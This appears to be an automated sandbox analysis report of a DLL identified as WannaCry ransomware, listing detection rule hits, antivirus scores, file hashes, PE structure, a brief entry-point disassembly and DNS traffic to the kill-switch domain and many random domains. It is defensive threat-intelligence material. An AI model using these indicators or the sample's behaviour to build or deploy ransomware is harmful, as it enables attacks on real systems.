• Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\mssecsvc.exe, Author: ReversingLabs
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 82%
• Antivirus: ReversingLabs, Detection: 97%
Process:C:\Windows\mssecsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3514368
Entropy (8bit):6.5250408221172975
Encrypted:false
SSDEEP:49152:nQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAAL:QqPoBhz1aRxcSUDk36SA8
MD5:3233ACED9279EF54267C479BBA665B90
SHA1:0B2CC142386641901511269503CDF6F641FAD305
SHA-256:F60F8A6BCAF1384A0D6A76D3E88007A8604560B263D2B8AEEE06FD74C9EE5B3B
SHA-512:55F25C51FFB89D46F2A7D2ED9B67701E178BD68E74B71D757D5FA14BD9530A427104FC36116633033EAD762ECF7960AB96429F5B0A085A701001C6832BA4555E
Malicious:true
Yara Hits:
• Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
• Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
• Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 85%
• Antivirus: ReversingLabs, Detection: 95%
Joe Sandbox View:
• Filename: 7B6t4L7E2o.dll, Detection: malicious
• Filename: 4GDffePnzH.dll, Detection: malicious
• Filename: HFKDS6VcNO.dll, Detection: malicious
• Filename: FjYNZSPNkt.dll, Detection: malicious
• Filename: kBBdc7Aoj4.dll, Detection: malicious
• Filename: tct5NKwZY8.dll, Detection: malicious
• Filename: 7KPQg3aXdC.dll, Detection: malicious
• Filename: ngFFOGiE7Y.dll, Detection: malicious
File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):5.052974659231348
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
• Generic Win/DOS Executable (2004/3) 0.20%
• DOS Executable Generic (2002/1) 0.20%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:y2jb4FtSNq.dll
File size:5267459
MD5:61d81fc3058ef67dd352bc2fd80bce2d
SHA1:bc7c0991e7e4646f8b2c9297a83a4259801e85bf
SHA256:66b760a1f256e538002892e020f0993d6e701dc15bb7333109b3a59b5b157082
SHA512:cd0565d8baf0d178341035d25aace9f25e92b5809fb74deced1a7a5ea2669912be4a80f61743c7e8d70668988bedd4e1a60adfd55023d7fb29a22a8967a2faf7
SSDEEP:49152:qnAQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAA:GDqPoBhz1aRxcSUDk36SA
TLSH:D836F601D2E51AA0DAF25EF7267ADB10833A6F45895BA66E1221500F0C77F1CDDE6F2C
                                                                                                                                              Icon Hash:74f0e4ecccdce0e4
                                                                                                                                              Entrypoint:0x100011e9
                                                                                                                                              Entrypoint Section:.text
                                                                                                                                              Digitally signed:false
                                                                                                                                              Imagebase:0x10000000
                                                                                                                                              Subsystem:windows gui
                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                                                                                                                                              DLL Characteristics:
                                                                                                                                              Time Stamp:0x59145751 [Thu May 11 12:21:37 2017 UTC]
                                                                                                                                              TLS Callbacks:
                                                                                                                                              CLR (.Net) Version:
                                                                                                                                              OS Version Major:4
                                                                                                                                              OS Version Minor:0
                                                                                                                                              File Version Major:4
                                                                                                                                              File Version Minor:0
                                                                                                                                              Subsystem Version Major:4
                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                              Import Hash:2e5708ae5fed0403e8117c645fb23e5b
                                                                                                                                              Instruction
                                                                                                                                              push ebp
                                                                                                                                              mov ebp, esp
                                                                                                                                              push ebx
                                                                                                                                              mov ebx, dword ptr [ebp+08h]
                                                                                                                                              push esi
                                                                                                                                              mov esi, dword ptr [ebp+0Ch]
                                                                                                                                              push edi
                                                                                                                                              mov edi, dword ptr [ebp+10h]
                                                                                                                                              test esi, esi
                                                                                                                                              jne 00007FD4B8C1F61Bh
                                                                                                                                              cmp dword ptr [10003140h], 00000000h
                                                                                                                                              jmp 00007FD4B8C1F638h
                                                                                                                                              cmp esi, 01h
                                                                                                                                              je 00007FD4B8C1F617h
                                                                                                                                              cmp esi, 02h
                                                                                                                                              jne 00007FD4B8C1F634h
                                                                                                                                              mov eax, dword ptr [10003150h]
                                                                                                                                              test eax, eax
                                                                                                                                              je 00007FD4B8C1F61Bh
                                                                                                                                              push edi
                                                                                                                                              push esi
                                                                                                                                              push ebx
                                                                                                                                              call eax
                                                                                                                                              test eax, eax
                                                                                                                                              je 00007FD4B8C1F61Eh
                                                                                                                                              push edi
                                                                                                                                              push esi
                                                                                                                                              push ebx
                                                                                                                                              call 00007FD4B8C1F52Ah
                                                                                                                                              test eax, eax
                                                                                                                                              jne 00007FD4B8C1F616h
                                                                                                                                              xor eax, eax
                                                                                                                                              jmp 00007FD4B8C1F660h
                                                                                                                                              push edi
                                                                                                                                              push esi
                                                                                                                                              push ebx
                                                                                                                                              call 00007FD4B8C1F3DCh
                                                                                                                                              cmp esi, 01h
                                                                                                                                              mov dword ptr [ebp+0Ch], eax
                                                                                                                                              jne 00007FD4B8C1F61Eh
                                                                                                                                              test eax, eax
                                                                                                                                              jne 00007FD4B8C1F649h
                                                                                                                                              push edi
                                                                                                                                              push eax
                                                                                                                                              push ebx
                                                                                                                                              call 00007FD4B8C1F506h
                                                                                                                                              test esi, esi
                                                                                                                                              je 00007FD4B8C1F617h
                                                                                                                                              cmp esi, 03h
                                                                                                                                              jne 00007FD4B8C1F638h
                                                                                                                                              push edi
                                                                                                                                              push esi
                                                                                                                                              push ebx
call 00007FD4B8C1F4F5h
test eax, eax
jne 00007FD4B8C1F615h
and dword ptr [ebp+0Ch], eax
cmp dword ptr [ebp+0Ch], 00000000h
je 00007FD4B8C1F623h
mov eax, dword ptr [10003150h]
test eax, eax
je 00007FD4B8C1F61Ah
push edi
push esi
push ebx
call eax
mov dword ptr [ebp+0Ch], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
pop esi
pop ebx
pop ebp
retn 000Ch
jmp dword ptr [10002028h]
Programming Language:
• [ C ] VS98 (6.0) build 8168
• [C++] VS98 (6.0) build 8168
• [RES] VS98 (6.0) cvtres build 1720
• [LNK] VS98 (6.0) imp/exp build 8168
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2190 | 0x48 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x203c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x500060 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x505000 | 0x5c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x28c | 0x1000 | False | 0.13037109375 | data | 1.4429971244731552 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2000 | 0x1d8 | 0x1000 | False | 0.072509765625 | data | 0.7346018133622799 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3000 | 0x154 | 0x1000 | False | 0.016845703125 | data | 0.085238686413312 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4000 | 0x500060 | 0x501000 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x505000 | 0x2ac | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country
W | 0x4060 | 0x500000 | data | English | United States

DLL | Import
KERNEL32.dll | CloseHandle, WriteFile, CreateFileA, SizeofResource, LockResource, LoadResource, FindResourceA, CreateProcessA
MSVCRT.dll | free, _initterm, malloc, _adjust_fdiv, sprintf

Name | Ordinal | Address
PlayGame | 1 | 0x10001114

Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                              Jul 23, 2022 01:48:24.408293962 CEST5671453192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.440026045 CEST53567148.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.441627026 CEST5107353192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.469676971 CEST53510738.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.474066019 CEST5623953192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.582082987 CEST53562398.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.584391117 CEST5875353192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.613313913 CEST53587538.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.615626097 CEST6473353192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.641983986 CEST53647338.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.644412994 CEST6359153192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.672591925 CEST53635918.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.673917055 CEST5987953192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.707659960 CEST53598798.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.709907055 CEST6021253192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.737694025 CEST53602128.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.741451025 CEST5117253192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.777004004 CEST53511728.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.779268980 CEST5189353192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.808573008 CEST53518938.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.810216904 CEST6262353192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.840200901 CEST53626238.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.841921091 CEST6380153192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.870671034 CEST53638018.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.871877909 CEST5460253192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.919764996 CEST53546028.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.921464920 CEST5155553192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.947329998 CEST53515558.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.951208115 CEST6314153192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:24.996172905 CEST53631418.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:24.997474909 CEST6318153192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:25.045352936 CEST53631818.8.8.8192.168.2.3
                                                                                                                                              Jul 23, 2022 01:48:25.048187017 CEST5299753192.168.2.38.8.8.8
                                                                                                                                              Jul 23, 2022 01:48:25.155997038 CEST53529978.8.8.8192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 23, 2022 01:44:23.724916935 CEST | 192.168.2.3 | 8.8.8.8 | 0xbe37 | Standard query (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:05.482811928 CEST | 192.168.2.3 | 8.8.8.8 | 0xfa63 | Standard query (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.243530989 CEST | 192.168.2.3 | 8.8.8.8 | 0xd3d1 | Standard query (0) | fosajt.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.274849892 CEST | 192.168.2.3 | 8.8.8.8 | 0xad7 | Standard query (0) | liamse.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.305587053 CEST | 192.168.2.3 | 8.8.8.8 | 0x7bd5 | Standard query (0) | boqbzc.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.345632076 CEST | 192.168.2.3 | 8.8.8.8 | 0x3635 | Standard query (0) | xyzrpb.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.372735977 CEST | 192.168.2.3 | 8.8.8.8 | 0x424 | Standard query (0) | phirwq.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.408293962 CEST | 192.168.2.3 | 8.8.8.8 | 0x699b | Standard query (0) | tvmwem.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.441627026 CEST | 192.168.2.3 | 8.8.8.8 | 0x5109 | Standard query (0) | wfuinm.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.474066019 CEST | 192.168.2.3 | 8.8.8.8 | 0x6ca5 | Standard query (0) | abeaay.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.584391117 CEST | 192.168.2.3 | 8.8.8.8 | 0x29b | Standard query (0) | qavmrl.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.615626097 CEST | 192.168.2.3 | 8.8.8.8 | 0xe8c0 | Standard query (0) | joddge.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.644412994 CEST | 192.168.2.3 | 8.8.8.8 | 0xe259 | Standard query (0) | exiuuy.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.673917055 CEST | 192.168.2.3 | 8.8.8.8 | 0x3503 | Standard query (0) | bauied.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.709907055 CEST | 192.168.2.3 | 8.8.8.8 | 0x818e | Standard query (0) | dpoead.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.741451025 CEST | 192.168.2.3 | 8.8.8.8 | 0x1da8 | Standard query (0) | tpmtiw.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.779268980 CEST | 192.168.2.3 | 8.8.8.8 | 0xcbf5 | Standard query (0) | glutbe.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.810216904 CEST | 192.168.2.3 | 8.8.8.8 | 0x2f9d | Standard query (0) | hmpjac.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.841921091 CEST | 192.168.2.3 | 8.8.8.8 | 0xf9d9 | Standard query (0) | xgxizm.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.871877909 CEST | 192.168.2.3 | 8.8.8.8 | 0xd72b | Standard query (0) | trptke.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.921464920 CEST | 192.168.2.3 | 8.8.8.8 | 0xab65 | Standard query (0) | tgvyjo.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.951208115 CEST | 192.168.2.3 | 8.8.8.8 | 0x413f | Standard query (0) | otoagh.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:24.997474909 CEST | 192.168.2.3 | 8.8.8.8 | 0x9c40 | Standard query (0) | ihepfj.com | A (IP address) | IN (0x0001)
Jul 23, 2022 01:48:25.048187017 CEST | 192.168.2.3 | 8.8.8.8 | 0x1288 | Standard query (0) | quydys.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 23, 2022 01:44:23.746457100 CEST | 8.8.8.8 | 192.168.2.3 | 0xbe37 | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.16.173.80 | A (IP address) | IN (0x0001)
Jul 23, 2022 01:44:23.746457100 CEST | 8.8.8.8 | 192.168.2.3 | 0xbe37 | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.17.244.81 | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:05.504637003 CEST | 8.8.8.8 | 192.168.2.3 | 0xfa63 | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.17.244.81 | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:05.504637003 CEST | 8.8.8.8 | 192.168.2.3 | 0xfa63 | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.16.173.80 | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:39.549423933 CEST | 8.8.8.8 | 192.168.2.3 | 0x8caa | Name error (3) | kuwazq.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:39.604020119 CEST | 8.8.8.8 | 192.168.2.3 | 0x1c0c | Name error (3) | mbxpjh.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:39.635500908 CEST | 8.8.8.8 | 192.168.2.3 | 0x7918 | Name error (3) | cudiqm.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:39.684672117 CEST | 8.8.8.8 | 192.168.2.3 | 0x8a18 | Name error (3) | uatacq.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:39.712487936 CEST | 8.8.8.8 | 192.168.2.3 | 0xaad2 | Name error (3) | wufhfo.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:39.753336906 CEST | 8.8.8.8 | 192.168.2.3 | 0xaae4 | Name error (3) | pnuoyg.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:39.809433937 CEST | 8.8.8.8 | 192.168.2.3 | 0xcb48 | Name error (3) | exevye.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:39.859280109 CEST | 8.8.8.8 | 192.168.2.3 | 0x3a3f | Name error (3) | rchrgb.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:39.890558004 CEST | 8.8.8.8 | 192.168.2.3 | 0x1f21 | Name error (3) | aoulrr.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:39.927709103 CEST | 8.8.8.8 | 192.168.2.3 | 0x23ad | Name error (3) | fudevu.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:39.967245102 CEST | 8.8.8.8 | 192.168.2.3 | 0x6255 | Name error (3) | iireby.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.000349045 CEST | 8.8.8.8 | 192.168.2.3 | 0x290a | Name error (3) | qmehuz.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.043453932 CEST | 8.8.8.8 | 192.168.2.3 | 0x8f00 | Name error (3) | wnzgoe.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.078761101 CEST | 8.8.8.8 | 192.168.2.3 | 0xd1e9 | Name error (3) | btkcso.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.106173992 CEST | 8.8.8.8 | 192.168.2.3 | 0xc08a | Name error (3) | qgbuwt.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.143222094 CEST | 8.8.8.8 | 192.168.2.3 | 0xa2e2 | Name error (3) | enqgsr.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.173316956 CEST | 8.8.8.8 | 192.168.2.3 | 0x9d53 | Name error (3) | iooaeg.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.201761961 CEST | 8.8.8.8 | 192.168.2.3 | 0xe16c | Name error (3) | olieyo.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.252249002 CEST | 8.8.8.8 | 192.168.2.3 | 0x43b0 | Name error (3) | djtidt.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.285356998 CEST | 8.8.8.8 | 192.168.2.3 | 0xd53e | Name error (3) | lcogil.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.323287010 CEST | 8.8.8.8 | 192.168.2.3 | 0x5cc0 | Name error (3) | mvnywi.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.364543915 CEST | 8.8.8.8 | 192.168.2.3 | 0x3b13 | Name error (3) | rffriz.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.393420935 CEST | 8.8.8.8 | 192.168.2.3 | 0xe8ff | Name error (3) | fuejrn.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.427232981 CEST | 8.8.8.8 | 192.168.2.3 | 0x2830 | Name error (3) | qmimjr.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.471981049 CEST | 8.8.8.8 | 192.168.2.3 | 0x1025 | Name error (3) | cixudc.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.500582933 CEST | 8.8.8.8 | 192.168.2.3 | 0xb82b | Name error (3) | chlntf.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.546382904 CEST | 8.8.8.8 | 192.168.2.3 | 0x2c1e | Name error (3) | youdqa.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.591535091 CEST | 8.8.8.8 | 192.168.2.3 | 0x1491 | Name error (3) | iremdw.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:46:40.631556034 CEST | 8.8.8.8 | 192.168.2.3 | 0x448c | Name error (3) | smezbn.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:01.370409966 CEST | 8.8.8.8 | 192.168.2.3 | 0xbd79 | Name error (3) | ysvfez.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:01.438143015 CEST | 8.8.8.8 | 192.168.2.3 | 0x67a5 | Name error (3) | kfgoeu.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:01.466941118 CEST | 8.8.8.8 | 192.168.2.3 | 0x513 | Name error (3) | uyjpue.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:01.525947094 CEST | 8.8.8.8 | 192.168.2.3 | 0x1e00 | Name error (3) | eymtmi.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:01.570406914 CEST | 8.8.8.8 | 192.168.2.3 | 0xa623 | Name error (3) | vgemhe.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:01.602948904 CEST | 8.8.8.8 | 192.168.2.3 | 0x93be | Name error (3) | bnwzie.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:01.667927027 CEST | 8.8.8.8 | 192.168.2.3 | 0xfc6 | Name error (3) | clpivo.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:01.702151060 CEST | 8.8.8.8 | 192.168.2.3 | 0x5fe8 | Name error (3) | qoumtu.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:01.760199070 CEST | 8.8.8.8 | 192.168.2.3 | 0xe647 | Name error (3) | cerbyj.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:01.956505060 CEST | 8.8.8.8 | 192.168.2.3 | 0xa2c5 | Name error (3) | uaqjzn.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:02.072362900 CEST | 8.8.8.8 | 192.168.2.3 | 0x3606 | Name error (3) | ahanjw.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:02.710213900 CEST | 8.8.8.8 | 192.168.2.3 | 0xfd96 | Name error (3) | dzbyvr.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:02.776103020 CEST | 8.8.8.8 | 192.168.2.3 | 0x345a | Name error (3) | ktceha.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:02.823795080 CEST | 8.8.8.8 | 192.168.2.3 | 0xd51c | Name error (3) | ureefd.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:02.869498014 CEST | 8.8.8.8 | 192.168.2.3 | 0x1532 | Name error (3) | jiarfr.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:22.991107941 CEST | 8.8.8.8 | 192.168.2.3 | 0xe73 | Name error (3) | uxcrve.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:23.045885086 CEST | 8.8.8.8 | 192.168.2.3 | 0xf9d3 | Name error (3) | oezaau.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:23.078193903 CEST | 8.8.8.8 | 192.168.2.3 | 0xfb15 | Name error (3) | toxthr.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:23.109165907 CEST | 8.8.8.8 | 192.168.2.3 | 0x5ee3 | Name error (3) | paelui.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:23.141596079 CEST | 8.8.8.8 | 192.168.2.3 | 0x6f2e | Name error (3) | aaeyfv.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:23.170037985 CEST | 8.8.8.8 | 192.168.2.3 | 0x1862 | Name error (3) | xeefyh.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:23.201833010 CEST | 8.8.8.8 | 192.168.2.3 | 0xb28 | Name error (3) | qtnarp.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:23.233378887 CEST | 8.8.8.8 | 192.168.2.3 | 0xbc13 | Name error (3) | eeauou.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:23.282629967 CEST | 8.8.8.8 | 192.168.2.3 | 0xd3e7 | Name error (3) | niongj.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:23.315304995 CEST | 8.8.8.8 | 192.168.2.3 | 0x8d6e | Name error (3) | akeofy.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:23.360740900 CEST | 8.8.8.8 | 192.168.2.3 | 0x979d | Name error (3) | dnirke.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:23.387505054 CEST | 8.8.8.8 | 192.168.2.3 | 0x87fa | Name error (3) | lanclm.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:23.417743921 CEST | 8.8.8.8 | 192.168.2.3 | 0x9135 | Name error (3) | egrbjv.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:23.447746992 CEST | 8.8.8.8 | 192.168.2.3 | 0xf1ea | Name error (3) | wlnmvm.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:43.548820972 CEST | 8.8.8.8 | 192.168.2.3 | 0x23f8 | Name error (3) | dvnexx.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:43.598320961 CEST | 8.8.8.8 | 192.168.2.3 | 0xc46c | Name error (3) | zyjedf.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:43.637161016 CEST | 8.8.8.8 | 192.168.2.3 | 0x3ce | Name error (3) | pxunuy.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:43.744357109 CEST | 8.8.8.8 | 192.168.2.3 | 0xa97a | Name error (3) | uplveo.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:43.775826931 CEST | 8.8.8.8 | 192.168.2.3 | 0x97ea | Name error (3) | rjirxk.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:43.804905891 CEST | 8.8.8.8 | 192.168.2.3 | 0xbaa5 | Name error (3) | otidym.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:43.834836006 CEST | 8.8.8.8 | 192.168.2.3 | 0x609a | Name error (3) | veqbbn.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:43.866971970 CEST | 8.8.8.8 | 192.168.2.3 | 0xef1e | Name error (3) | seyuei.com | none | none | A (IP address) | IN (0x0001)
Jul 23, 2022 01:47:43.901011944 CEST | 8.8.8.8 | 192.168.2.3 | 0x1384 | Name error (3) | wcxezu.com | none | none | A (IP address) | IN (0x0001)
